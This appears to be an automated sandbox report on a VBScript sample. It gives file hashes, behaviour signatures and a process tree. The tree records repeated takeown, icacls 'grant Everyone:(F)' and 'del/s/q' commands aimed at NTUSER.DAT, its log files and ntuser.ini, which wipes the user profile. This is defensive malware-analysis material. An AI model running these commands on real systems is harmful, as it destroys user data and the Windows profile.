Analysis

  • max time kernel
    141s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    01/09/2024, 13:14

General

  • Target

    file.vbs

  • Size

    506B

  • MD5

    0c7e1be66d051894037fbd4d3ba7e873

  • SHA1

    f42da981a96a415fcfe54b03369c024579ca91e6

  • SHA256

    8376d1d8d0eacb7462cdf9c4548e5e700999ec3112355dcb48041a1b636179e6

  • SHA512

    92e15380deffd98351b16962b23b41492c528f02f9993198c4010c3ed1d50a6c7cbab38aa621c2f04eaf96a7431d01eb8ef1299f59ccfae15aac4dfa72c1ce74

Malware Config

Signatures

  • Possible privilege escalation attempt (14 IoCs)
  • Checks computer location settings (2 TTPs, 1 IoCs)

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions (1 TTPs, 14 IoCs)
  • Reads user/profile data of web browsers (2 TTPs)

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Indicator Removal: File Deletion (1 TTPs)

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Enumerates physical storage devices (1 TTPs)

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory (42 IoCs)

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4496
    • C:\Windows\System32\takeown.exe
      "C:\Windows\System32\takeown.exe" /f C:\Users\Admin\NTUSER.DAT
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:3940
    • C:\Windows\System32\icacls.exe
      "C:\Windows\System32\icacls.exe" C:\Users\Admin\NTUSER.DAT /grant Everyone:(F)
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:416
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\NTUSER.DAT
      2⤵
      PID:2936
    • C:\Windows\System32\takeown.exe
      "C:\Windows\System32\takeown.exe" /f C:\Users\Admin\ntuser.dat.LOG1
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:2780
    • C:\Windows\System32\icacls.exe
      "C:\Windows\System32\icacls.exe" C:\Users\Admin\ntuser.dat.LOG1 /grant Everyone:(F)
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:2916
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\ntuser.dat.LOG1
      2⤵
      PID:1348
    • C:\Windows\System32\takeown.exe
      "C:\Windows\System32\takeown.exe" /f C:\Users\Admin\ntuser.dat.LOG2
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:1436
    • C:\Windows\System32\icacls.exe
      "C:\Windows\System32\icacls.exe" C:\Users\Admin\ntuser.dat.LOG2 /grant Everyone:(F)
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:2284
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\ntuser.dat.LOG2
      2⤵
      PID:1596
    • C:\Windows\System32\takeown.exe
      "C:\Windows\System32\takeown.exe" /f C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:5036
    • C:\Windows\System32\icacls.exe
      "C:\Windows\System32\icacls.exe" C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf /grant Everyone:(F)
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:5068
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf
      2⤵
      PID:4388
    • C:\Windows\System32\takeown.exe
      "C:\Windows\System32\takeown.exe" /f C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:4092
    • C:\Windows\System32\icacls.exe
      "C:\Windows\System32\icacls.exe" C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms /grant Everyone:(F)
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:900
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms
      2⤵
      PID:4032
    • C:\Windows\System32\takeown.exe
      "C:\Windows\System32\takeown.exe" /f C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:3544
    • C:\Windows\System32\icacls.exe
      "C:\Windows\System32\icacls.exe" C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms /grant Everyone:(F)
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:4144
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms
      2⤵
      PID:3240
    • C:\Windows\System32\takeown.exe
      "C:\Windows\System32\takeown.exe" /f C:\Users\Admin\ntuser.ini
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:1864
    • C:\Windows\System32\icacls.exe
      "C:\Windows\System32\icacls.exe" C:\Users\Admin\ntuser.ini /grant Everyone:(F)
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:3940
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\ntuser.ini
      2⤵
      PID:416

Network

MITRE ATT&CK Enterprise v15
